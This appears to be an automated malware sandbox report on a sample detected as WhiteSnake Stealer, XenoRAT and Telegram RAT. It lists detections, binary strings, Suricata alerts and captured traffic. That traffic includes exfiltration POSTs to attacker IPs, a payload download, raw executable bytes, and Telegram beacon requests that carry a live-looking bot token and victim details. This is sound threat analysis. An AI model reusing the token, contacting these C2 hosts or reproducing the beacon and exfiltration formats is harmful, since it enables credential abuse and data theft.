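    for src, dst, rule, detail in scan(SAMPLE_RECORDS):
        print(f"{src} -> {dst} [{rule}] {detail}")
```

The bot token is a credential: keep the full value (from `bot_token`) for the abuse report to Telegram and for pulling the bot's identity, and put only the redacted form in tickets and shared detections.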

                      AV Detection

Source: 0LpFv1haTA.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 41.0.manager.exe.240000.0.unpack | Malware Configuration Extractor: XenoRAT {"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
Source: 0LpFv1haTA.exe.5500.13.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\manager.exe | ReversingLabs: Detection: 91%
Source: 0LpFv1haTA.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\manager.exe | Joe Sandbox ML: detected
Source: 0LpFv1haTA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 7_2_00007FF848F187D1 CryptUnprotectData, 7_2_00007FF848F187D1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F187C1 CryptUnprotectData, 13_2_00007FF848F187C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F1890D CryptUnprotectData, 13_2_00007FF848F1890D
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: 0LpFv1haTA.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 0_2_00007FF848F05453
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1D416h, 7_2_00007FF848F1CD0F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 7_2_00007FF848F165B0
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1E8B0h, 7_2_00007FF848F1E0C4
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1DAA9h, 7_2_00007FF848F1BB98
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 7_2_00007FF848F216DF
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1DAA9h, 7_2_00007FF848F1D59F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F2055Dh, 7_2_00007FF848F20459
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F14908h, 7_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F14934h, 7_2_00007FF848F148F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1E577h, 7_2_00007FF848F1E37C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1DA99h, 13_2_00007FF848F1BAE2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F2C369h, 13_2_00007FF848F2C135
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F14934h, 13_2_00007FF848F14141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 13_2_00007FF848F1615E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1DA99h, 13_2_00007FF848F1B9ED
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F2E654h, 13_2_00007FF848F2E49A
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1D20Fh, 13_2_00007FF848F1CC9E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1D406h, 13_2_00007FF848F1CC9E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F2210Dh, 13_2_00007FF848F21E8E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1E567h, 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1E8A0h, 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F21648h, 13_2_00007FF848F210BE
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 13_2_00007FF848F14F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F237F1h, 13_2_00007FF848F232C9
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F1DA99h, 13_2_00007FF848F1D58F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F17A3Ch, 13_2_00007FF848F17839
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F14908h, 13_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 13_2_00007FF848F1FFBF
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 40_2_00007FF848F26DD0
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F27A3Ch, 40_2_00007FF848F27858
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F24908h, 40_2_00007FF848F24894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F24934h, 40_2_00007FF848F248F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F27A3Ch, 40_2_00007FF848F25792
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 40_2_00007FF848F29BF6
Source: C:\Users\user\AppData\Roaming\manager.exe | Code function: 4x nop then jmp 023B185Ah, 41_2_023B0B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 4x nop then jmp 0322185Ah, 42_2_03220B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 4x nop then jmp 0322185Ah, 42_2_03220B78
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 4x nop then jmp 00ED185Ah, 45_2_00ED0B88
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F34934h, 46_2_00007FF848F34141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then dec eax, 46_2_00007FF848F34F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 4x nop then jmp 00007FF848F34908h, 46_2_00007FF848F34894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax47_2_00007FF848F166FB
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14934h47_2_00007FF848F14141
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax47_2_00007FF848F14F54
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14908h47_2_00007FF848F14894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax47_2_00007FF848F19D36
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F17B7Ch47_2_00007FF848F17979
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax48_2_00007FF848F16F09
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14908h48_2_00007FF848F14894
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F14934h48_2_00007FF848F148F3
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then dec eax48_2_00007FF848F19D36
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeCode function: 4x nop then jmp 00007FF848F17B7Ch48_2_00007FF848F17979

                      Networking

                      Source: Network traffic | Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49711 -> 185.253.7.60:8080
                      Source: Network traffic | Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49708 -> 185.253.7.60:8080
                      Source: Network traffic | Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49711 -> 185.253.7.60:8080
                      Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49738 -> 45.82.65.63:80
                      Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49739 -> 188.120.242.78:8817
                      Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49729 -> 167.99.138.249:8080
                      Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49737 -> 206.189.109.146:80
                      Source: Network traffic | Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49708 -> 185.253.7.60:8080
                      Source: Network traffic | Suricata IDS: 2045869 - Severity 1 - ET MALWARE WhiteSnake Stealer Telegram Checkin : 192.168.2.5:49740 -> 149.154.167.220:443
                      Source: Malware configuration extractor | URLs: 193.149.187.135
                      Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 8817
                      Source: unknown | Network traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: unknown | Network traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: unknown | DNS query: name: api.telegram.org
                      Source: Yara match | File source: 0LpFv1haTA.exe, type: SAMPLE
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, type: DROPPED
                      Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 185.253.7.60:8080
                      Source: global traffic | TCP traffic: 192.168.2.5:49729 -> 167.99.138.249:8080
                      Source: global traffic | TCP traffic: 192.168.2.5:49739 -> 188.120.242.78:8817
                      Source: global traffic | TCP traffic: 192.168.2.5:49744 -> 193.149.187.135:4444
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                        Date: Fri, 27 Sep 2024 21:28:02 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Last-Modified: Sun, 22 Sep 2024 18:44:49 GMT
                        ETag: "cc00-622b9aabbea40"
                        Accept-Ranges: bytes
                        Content-Length: 52224
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdos-program
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 98 e7 d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c2 00 00 00 08 00 00 00 00 00 00 de e1 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e1 00 00 57 00 00 00 00 00 01 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 c1 00 00 00 20 00 00 00 c2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 00 01 00 00 06 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 e1 00 00 00 00 00 00 48 00 00 00 02 00 05 00 90 7a 00 00 f4 66 00 00 03 00 02 00 70 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 6f 6f 6d 38 32 35 00 03 ac 67 42 16 f3 e1 5c 76 1e e1 a5 e2 55 f0 67 95 36 23 c8 b3 88 b4 45 9e 13 f9 78 d7 c8 46 f4 22 02 28 17 00 00 0a 00 2a da 02 73 18 00 00 0a 7d 03 00 00 04 02 72 01 00 00 70 7d 04 00 00 04 02 28 17 00 00 0a 00 00 28 19 00 00 0a 14 fe 06 0b 00 00 06 73 1a 00 00 0a 6f 1b 00 00 0a 00 2a 06 2a 5e 02 28 17 00 00 0a 00 00 02 04 7d 1b 00 00 04 02 03 7d 1a 00 00 04 2a 0a 00 2a de 02 73 6c 00 00 0a 7d 6f 00 00 04 02 15 7d 72 00 00 04 02 15 7d 73 00 00 04 02 15 7d 74 00 00 04 02 28 17 00 00 0a 00 00 02 03 7d 70 00 00 04 02 04 7d 6e 00 00 04 2a 3e 00 02 7b 6f 00 00 04 03 6f 6d 00 00 0a 00 2a 3e 00 02 7b 70 00 00 04 03 6f 5a 00 00 06 00 2a 3a 00 02 7b 70 00 00 04 6f 5b 00 00 06 00 2a 5a 02 16 7d ab 00 00 04 02 17 7d ad 00 00 04 02 28 17 00 00 0a 00 2a ae 02 16 7d b0 00 00 04 02 28 17 00 00 0a 00 00 02 03 7d ae 00 00 04 02 7b ae 00 00 04 17 6f 98 00 00 0a 00 02 04 7d af 00 00 04 2a 5
                      Source: global traffic | HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /line?fields=query,country HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1 | Host: 185.253.7.60:8080 | Content-Length: 135595 | Expect: 100-continue | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /line?fields=query,country HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1 | Host: 185.253.7.60:8080 | Content-Length: 140694 | Expect: 100-continue | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /manager.exe HTTP/1.1 | Host: 185.80.128.17 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1 | Host: 185.253.7.60:8080 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1 | Host: 185.253.7.60:8080 | Connection: Keep-Alive
                      Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox View | ASN Name: THEFIRST-ASRU THEFIRST-ASRU
                      Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknown | DNS query: name: ip-api.com
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.253.7.60
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: serveo.net
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 135595Expect: 100-continueConnection: Keep-Alive
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.30.140.234:9080
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:21325/enumerate
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, helloworld.txt.13.drString found in binary or memory: http://127.0.0.1:7634/
